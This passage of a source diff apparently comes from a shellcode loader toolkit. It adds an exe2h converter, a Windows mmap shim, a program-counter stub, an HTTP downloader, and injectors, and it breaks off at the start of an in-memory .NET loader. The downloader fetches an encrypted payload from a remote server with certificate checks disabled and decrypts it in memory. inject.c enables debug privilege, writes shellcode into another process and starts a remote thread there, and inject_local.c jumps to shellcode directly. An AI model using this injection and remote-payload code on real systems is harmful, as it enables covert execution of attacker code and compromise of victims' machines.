332 if(valid_dos_hdr(map) && valid_nt_hdr(map)) {
333 printf(" [ Found valid DOS and NT header.\n");
334 // get the .text section
335 sh = SecHdr(map);
336 // if a section header was returned
337 if(sh != NULL) {
338 printf(" [ Locating .text section.\n");
339 // locate the .text section
340 for(i=0; i<SecSize(map); i++) {
341 if(strcmp((char*)sh[i].Name, ".text") == 0) {
342 ofs = rva2ofs(map, sh[i].VirtualAddress);
343
344 if(ofs != -1) {
345 cs = (map + ofs);
346 len = sh[i].Misc.VirtualSize;
347 // convert to header file
348 bin2h(map, argv[1], cs, len);
349 bin2go(map, argv[1], cs, len);
350 break;
351 }
352 }
353 }
354 }
355 } else {
356 printf(" [ No valid DOS or NT header found.\n");
357 // treat file as binary
358 bin2h(NULL, argv[1], map, fs.st_size);
359 bin2go(NULL, argv[1], map, fs.st_size);
360 //bin2array(NULL, argv[1], map, fs.st_size);
361 }
362 munmap(map, fs.st_size);
363 }
364 }
365 close(fd);
366 return 0;
367 }
+73
-0
loader/exe2h/mmap-windows.c less more
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 ret = MAP_FAILED;
61 }
62 CloseHandle(h);
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 }
70
71 #undef DWORD_HI
72 #undef DWORD_LO
+45
-0
loader/exe2h/mmap.h less more
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
+61
-0
loader/getpc.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // Function to return the program counter.
32 // Always place this at the end of payload.
33 // Tested with x86 build of MSVC 2019 and MinGW. YMMV.
34 #if defined(_MSC_VER)
35 #if defined(_M_IX86)
36 __declspec(naked) char *get_pc(void) {
37 __asm {
38 call pc_addr
39 pc_addr:
40 pop eax
41 sub eax, 5
42 ret
43 }
44 }
45 #endif
46 #elif defined(__GNUC__)
47 #if defined(__i386__)
48 asm (
49 ".global get_pc\n"
50 ".global _get_pc\n"
51 "_get_pc:\n"
52 "get_pc:\n"
53 " call pc_addr\n"
54 "pc_addr:\n"
55 " pop eax\n"
56 " sub eax, 5\n"
57 " ret\n"
58 );
59 #endif
60 #endif
+299
-0
loader/http_client.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL DownloadFromHTTP(PDONUT_INSTANCE inst) {
32 HINTERNET hin, con, req;
33 PBYTE inbuf=NULL;
34 DWORD chunklen, pos, res, inlen, s, n, rd, len, code=0;
35 BOOL bResult = FALSE, bSecure = FALSE, bIgnore = TRUE;
36 URL_COMPONENTS uc;
37 CHAR host[MAX_PATH],
38 file[MAX_PATH],
39 username[64], password[64];
40 SIZE_T rs;
41 NTSTATUS status;
42 PSYSCALL_LIST syscall_list;
43
44 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
45
46 // default flags for HTTP client
47 DWORD flags = INTERNET_FLAG_KEEP_CONNECTION |
48 INTERNET_FLAG_DONT_CACHE |
49 INTERNET_FLAG_NO_UI |
50 INTERNET_FLAG_PRAGMA_NOCACHE |
51 INTERNET_FLAG_NO_AUTO_REDIRECT;
52
53 Memset(&uc, 0, sizeof(uc));
54
55 uc.dwStructSize = sizeof(uc);
56
57 uc.lpszHostName = host;
58 uc.dwHostNameLength = sizeof(host);
59
60 uc.lpszUrlPath = file;
61 uc.dwUrlPathLength = sizeof(file);
62
63 uc.lpszUserName = username;
64 uc.dwUserNameLength = sizeof(username);
65
66 uc.lpszPassword = password;
67 uc.dwPasswordLength = sizeof(password);
68
69 if(!inst->api.InternetCrackUrl(
70 inst->server, 0, ICU_DECODE, &uc)) {
71 DPRINT("InternetCrackUrl");
72 return FALSE;
73 }
74
75 bSecure = (uc.nScheme == INTERNET_SCHEME_HTTPS);
76
77 // if secure connection, update the flags
78 if(bSecure) {
79 flags |= INTERNET_FLAG_SECURE;
80 // ignore invalid certificates?
81 if(bIgnore) {
82 flags |= INTERNET_FLAG_IGNORE_CERT_CN_INVALID |
83 INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
84 }
85 }
86
87 hin = inst->api.InternetOpen(
88 NULL, INTERNET_OPEN_TYPE_PRECONFIG,
89 NULL, NULL, 0);
90
91 if(hin == NULL) return FALSE;
92
93 DPRINT("Creating %s connection for %s",
94 bSecure ? "HTTPS" : "HTTP", host);
95
96 con = inst->api.InternetConnect(
97 hin, host, uc.nPort, NULL, NULL,
98 INTERNET_SERVICE_HTTP, 0, 0);
99
100 if(con != NULL) {
101 if(uc.dwUrlPathLength == 0) {
102 file[0] = '/';
103 file[1] = '\0';
104 }
105 DPRINT("Opening GET request for %s", file);
106
107 req = inst->api.HttpOpenRequest(
108 con, NULL, file, NULL,
109 NULL, NULL, flags, 0);
110
111 if(req != NULL) {
112
113 // see if we should ignore invalid certificates for this request
114 if(bSecure) {
115 if(flags & INTERNET_FLAG_IGNORE_CERT_CN_INVALID) {
116 n = sizeof (s);
117
118 s = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
119 SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
120 SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
121 SECURITY_FLAG_IGNORE_WRONG_USAGE |
122 SECURITY_FLAG_IGNORE_REVOCATION;
123
124 DPRINT("Setting option to ignore invalid certificates");
125
126 inst->api.InternetSetOption(
127 req,
128 INTERNET_OPTION_SECURITY_FLAGS,
129 &s,
130 sizeof(s));
131 }
132 }
133 // set username
134 if(uc.dwUserNameLength != 0) {
135 DPRINT("Using username : %s", uc.lpszUserName);
136
137 bResult = inst->api.InternetSetOption(
138 req, INTERNET_OPTION_USERNAME,
139 uc.lpszUserName, uc.dwUserNameLength);
140
141 if(!bResult) {
142 DPRINT("Error with InternetSetOption(INTERNET_OPTION_USERNAME)");
143 }
144 }
145
146 // set password
147 if(uc.dwPasswordLength != 0) {
148 DPRINT("Using password : %s", uc.lpszPassword);
149 bResult = inst->api.InternetSetOption(
150 req, INTERNET_OPTION_PASSWORD,
151 uc.lpszPassword, uc.dwPasswordLength);
152
153 if(!bResult) {
154 DPRINT("Error with InternetSetOption(INTERNET_OPTION_PASSWORD)");
155 }
156 }
157
158 DPRINT("Sending request");
159
160 if(inst->api.HttpSendRequest(req, NULL, 0, NULL, 0)) {
161 len = sizeof(DWORD);
162 code = 0;
163 DPRINT("Querying status code");
164
165 if(inst->api.HttpQueryInfo(
166 req,
167 HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER,
168 &code, &len, 0))
169 {
170 DPRINT("Code is %i", code);
171
172 if(code == HTTP_STATUS_OK) {
173 // try to query the content length
174 len = sizeof(SIZE_T);
175 inlen = 0;
176
177 res = inst->api.HttpQueryInfo(
178 req,
179 HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER,
180 &inlen, &len, 0);
181
182 // if there's no content length
183 if(!res) {
184 DPRINT("Error reading content length.");
185 if(inst->api.GetLastError() == ERROR_HTTP_HEADER_NOT_FOUND) {
186 DPRINT("Retrieving data in chunked mode.");
187 // perform a chunked read
188 for(inlen=0;;) {
189 // determine what's available
190 res = inst->api.InternetQueryDataAvailable(req, &chunklen, 0, 0);
191
192 // if call fails or nothing to read, end loop
193 if(!res || chunklen == 0) {
194 break;
195 }
196 if(inbuf == NULL) {
197 // allocate buffer for chunk to be read
198 inbuf = inst->api.HeapAlloc(
199 inst->api.GetProcessHeap(),
200 HEAP_NO_SERIALIZE, chunklen);
201 if(inbuf == NULL) {
202 DPRINT("HeapAlloc");
203 break;
204 }
205 } else {
206 // expand size of buffer
207 inbuf = inst->api.HeapReAlloc(
208 inst->api.GetProcessHeap(),
209 HEAP_NO_SERIALIZE,
210 inbuf, inlen + chunklen);
211
212 if(inbuf == NULL) {
213 DPRINT("HeapReAlloc");
214 break;
215 }
216 }
217 // read chunk
218 res = inst->api.InternetReadFile(
219 req, inbuf+inlen, chunklen, &rd);
220
221 inlen += chunklen;
222 }
223 }
224 } else {
225 DPRINT("Retrieving %ld bytes of data in single read.", inlen);
226 if(inlen != 0) {
227 inbuf = inst->api.HeapAlloc(
228 inst->api.GetProcessHeap(),
229 HEAP_NO_SERIALIZE, inlen);
230
231 if(inbuf != NULL) {
232 rd = 0;
233 DPRINT("Reading %i bytes...", inlen);
234 bResult = inst->api.InternetReadFile(
235 req, inbuf, inlen, &rd);
236 } else {
237 DPRINT("HeapAlloc");
238 }
239 }
240 }
241 } else {
242 DPRINT("HTTP response was %i", code);
243 }
244 } else {
245 DPRINT("HttpQueryInfo");
246 }
247 } else {
248 DPRINT("HttpSendRequest");
249 }
250
251 if(inbuf != NULL && inlen != 0) {
252 DPRINT("Copying %i bytes to VM", inlen);
253 rs = inlen;
254 status = NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&inst->module.p, 0, &rs, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, syscall_list);
255
256 if(NT_SUCCESS(status)) {
257 Memcpy(inst->module.p, inbuf, inlen);
258 bResult = TRUE;
259 } else {
260 bResult = FALSE;
261 }
262 Memset(inbuf, 0, inlen);
263
264 inst->api.HeapFree(
265 inst->api.GetProcessHeap(),
266 HEAP_NO_SERIALIZE, inbuf);
267 }
268 DPRINT("Closing request");
269 inst->api.InternetCloseHandle(req);
270 }
271 DPRINT("Closing connection handle");
272 inst->api.InternetCloseHandle(con);
273 }
274 DPRINT("Closing internet handle");
275 inst->api.InternetCloseHandle(hin);
276
277 if(bResult && inst->entropy == DONUT_ENTROPY_DEFAULT) {
278 PDONUT_MODULE mod = inst->module.p;
279
280 DPRINT("Decrypting %lli bytes of module", inst->mod_len);
281
282 donut_decrypt(inst->mod_key.mk,
283 inst->mod_key.ctr,
284 mod,
285 inst->mod_len);
286
287 DPRINT("Generating hash to verify decryption");
288 ULONG64 mac = maru(inst->sig, inst->iv);
289
290 DPRINT("Module : %016llx | Result : %016llx", mod->mac, mac);
291
292 if(mac != mod->mac) {
293 DPRINT("Decryption failed");
294 return FALSE;
295 }
296 }
297 return bResult;
298 }
+233
-0
loader/inject.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <windows.h>
32 #include <stdio.h>
33 #include <tlhelp32.h>
34
35 typedef struct _CLIENT_ID {
36 PVOID UniqueProcess;
37 PVOID UniqueThread;
38 } CLIENT_ID, *PCLIENT_ID;
39
40 typedef NTSTATUS (NTAPI *RtlCreateUserThread_t) (
41 IN HANDLE ProcessHandle,
42 IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
43 IN BOOLEAN CreateSuspended,
44 IN ULONG StackZeroBits,
45 IN OUT PULONG StackReserved,
46 IN OUT PULONG StackCommit,
47 IN PVOID StartAddress,
48 IN PVOID StartParameter OPTIONAL,
49 OUT PHANDLE ThreadHandle,
50 OUT PCLIENT_ID ClientID);
51
52 BOOL EnablePrivilege(PCHAR szPrivilege){
53 HANDLE hToken;
54 BOOL bResult;
55 LUID luid;
56 TOKEN_PRIVILEGES tp;
57
58 // open token for current process
59 bResult = OpenProcessToken(GetCurrentProcess(),
60 TOKEN_ADJUST_PRIVILEGES, &hToken);
61
62 if(!bResult) return FALSE;
63
64 // lookup privilege
65 bResult = LookupPrivilegeValue(NULL, szPrivilege, &luid);
66 if(bResult){
67 tp.PrivilegeCount = 1;
68 tp.Privileges[0].Luid = luid;
69 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
70
71 // adjust token
72 bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
73 }
74 CloseHandle(hToken);
75 return bResult;
76 }
77
78 // display error message for last error code
79 VOID xstrerror (PCHAR fmt, ...){
80 PCHAR error=NULL;
81 va_list arglist;
82 CHAR buffer[1024];
83 DWORD dwError=GetLastError();
84
85 va_start(arglist, fmt);
86 vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist);
87 va_end (arglist);
88
89 if (FormatMessage (
90 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
91 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
92 (LPSTR)&error, 0, NULL))
93 {
94 printf(" [ %s : %s\n", buffer, error);
95 LocalFree (error);
96 } else {
97 printf(" [ %s error : %08lX\n", buffer, dwError);
98 }
99 }
100
101 DWORD name2pid(PCHAR procName){
102 HANDLE hSnap;
103 PROCESSENTRY32 pe32;
104 DWORD pid=0;
105
106 // create snapshot of system
107 hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
108 if(hSnap == INVALID_HANDLE_VALUE) return 0;
109
110 pe32.dwSize = sizeof(PROCESSENTRY32);
111
112 // get first process
113 if(Process32First(hSnap, &pe32)){
114 do {
115 if(!lstrcmpi(pe32.szExeFile, procName)){
116 pid=pe32.th32ProcessID;
117 break;
118 }
119 } while(Process32Next(hSnap, &pe32));
120 }
121 CloseHandle(hSnap);
122 return pid;
123 }
124
125 BOOL injectPIC(DWORD id, LPVOID code, DWORD codeLen) {
126 SIZE_T wr;
127 HANDLE hp,ht;
128 LPVOID cs;
129 RtlCreateUserThread_t pRtlCreateUserThread;
130 HMODULE hn;
131 CLIENT_ID cid;
132 NTSTATUS nt=~0UL;
133 DWORD t;
134
135 // 1. resolve API address
136 hn = GetModuleHandle("ntdll.dll");
137 pRtlCreateUserThread=(RtlCreateUserThread_t)
138 GetProcAddress(hn, "RtlCreateUserThread");
139
140 printf(" [ opening process %li\n", id);
141 // 2. open the target process
142 hp=OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
143
144 if(hp == NULL) return FALSE;
145
146 // 3. allocate executable-read-write (XRW) memory for payload
147 printf(" [ allocating memory for payload.\n");
148 cs=VirtualAllocEx(hp, NULL, codeLen,
149 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
150
151 printf(" [ writing code to %p.\n", cs);
152 // 4. copy the payload to remote memory
153 WriteProcessMemory(hp, cs, code, codeLen, &wr);
154 VirtualProtectEx(hp, cs, codeLen, PAGE_EXECUTE_READ, &t);
155
156 printf(" [ press any key to continue.\n");
157 getchar();
158
159 // 5. execute payload in remote process
160 printf(" [ creating new thread.\n");
161 nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL,
162 NULL, cs, NULL, &ht, &cid);
163
164 //AttachConsole(id);
165
166 printf(" [ nt status is %lx\n", nt);
167 WaitForSingleObject(ht, INFINITE);
168
169 // 6. close remote thread handle
170 CloseHandle(ht);
171
172 // 7. free remote memory
173 printf(" [ freeing memory.\n");
174 VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT);
175
176 // 8. close remote process handle
177 CloseHandle(hp);
178 return nt == 0; // STATUS_SUCCESS
179 }
180
181 DWORD getdata(PCHAR path, LPVOID *data){
182 HANDLE hf;
183 DWORD len,rd=0;
184
185 // 1. open the file
186 hf=CreateFile(path, GENERIC_READ, 0, 0,
187 OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
188
189 if(hf!=INVALID_HANDLE_VALUE){
190 // get file size
191 len=GetFileSize(hf, 0);
192 // allocate memory
193 *data=malloc(len + 16);
194 // read file contents into memory
195 ReadFile(hf, *data, len, &rd, 0);
196 CloseHandle(hf);
197 }
198 return rd;
199 }
200
201 int main(int argc, char *argv[]){
202 LPVOID code;
203 SIZE_T code_len;
204 DWORD pid;
205
206 if (argc != 3){
207 printf("\n [ usage: inject <process id | process name> <loader.bin>\n");
208 return 0;
209 }
210
211 if(!EnablePrivilege(SE_DEBUG_NAME)) {
212 printf(" [ cannot enable SeDebugPrivilege.\n");
213 }
214
215 // get pid
216 pid=atoi(argv[1]);
217 if(pid==0) pid=name2pid(argv[1]);
218
219 if(pid==0) {
220 printf(" [ unable to obtain process id.\n");
221 return 0;
222 }
223 // pic
224 code_len = getdata(argv[2], &code);
225 if(code_len == 0) {
226 printf(" [ unable to read payload.\n");
227 return 0;
228 }
229 injectPIC(pid, code, code_len);
230 free(code);
231 return 0;
232 }
+129
-0
loader/inject_local.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <windows.h>
32 #include <stdio.h>
33 #include <tlhelp32.h>
34
35 // display error message for last error code
36 VOID xstrerror (PCHAR fmt, ...){
37 PCHAR error=NULL;
38 va_list arglist;
39 CHAR buffer[1024];
40 DWORD dwError=GetLastError();
41
42 va_start(arglist, fmt);
43 vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist);
44 va_end (arglist);
45
46 if (FormatMessage (
47 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
48 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
49 (LPSTR)&error, 0, NULL))
50 {
51 printf(" [ %s : %s\n", buffer, error);
52 LocalFree (error);
53 } else {
54 printf(" [ %s error : %08lX\n", buffer, dwError);
55 }
56 }
57
58 BOOL injectPIC(LPVOID code, DWORD codeLen) {
59 LPVOID cs;
60 DWORD t;
61
62 // 1. allocate read-write (RW) memory for payload
63 printf(" [ allocating memory for payload.\n");
64 cs=VirtualAlloc(NULL, codeLen,
65 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
66
67 if (cs == NULL) {
68 printf(" [ unable to allocate memory.\n");
69 return FALSE;
70 }
71
72 printf(" [ writing code to 0x%p.\n", cs);
73 // 2. copy the payload to remote memory
74 memcpy(cs, code, codeLen);
75 //WriteProcessMemory(hp, cs, code, codeLen, &wr);
76 VirtualProtect(cs, codeLen, PAGE_EXECUTE_READ, &t);
77
78 printf(" [ press any key to continue.\n");
79 getchar();
80
81 // 3. execute payload in remote process
82 printf(" [ jumping to shellcode.\n");
83 void (*function)();
84 function = (void (*)())cs;
85 function();
86
87 return TRUE;
88 }
89
90 DWORD getdata(PCHAR path, LPVOID *data){
91 HANDLE hf;
92 DWORD len,rd=0;
93
94 // 1. open the file
95 hf=CreateFile(path, GENERIC_READ, 0, 0,
96 OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
97
98 if(hf!=INVALID_HANDLE_VALUE){
99 // get file size
100 len=GetFileSize(hf, 0);
101 // allocate memory
102 *data=malloc(len + 16);
103 // read file contents into memory
104 ReadFile(hf, *data, len, &rd, 0);
105 CloseHandle(hf);
106 }
107 return rd;
108 }
109
110 int main(int argc, char *argv[]){
111 LPVOID code;
112 SIZE_T code_len;
113
114 if (argc != 2){
115 printf("\n [ usage: inject <loader.bin>\n");
116 return 0;
117 }
118
119 // pic
120 code_len = getdata(argv[1], &code);
121 if(code_len == 0) {
122 printf(" [ unable to read payload.\n");
123 return 0;
124 }
125 injectPIC(code, code_len);
126 free(code);
127 return 0;
128 }
+382
-0
loader/inmem_dotnet.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
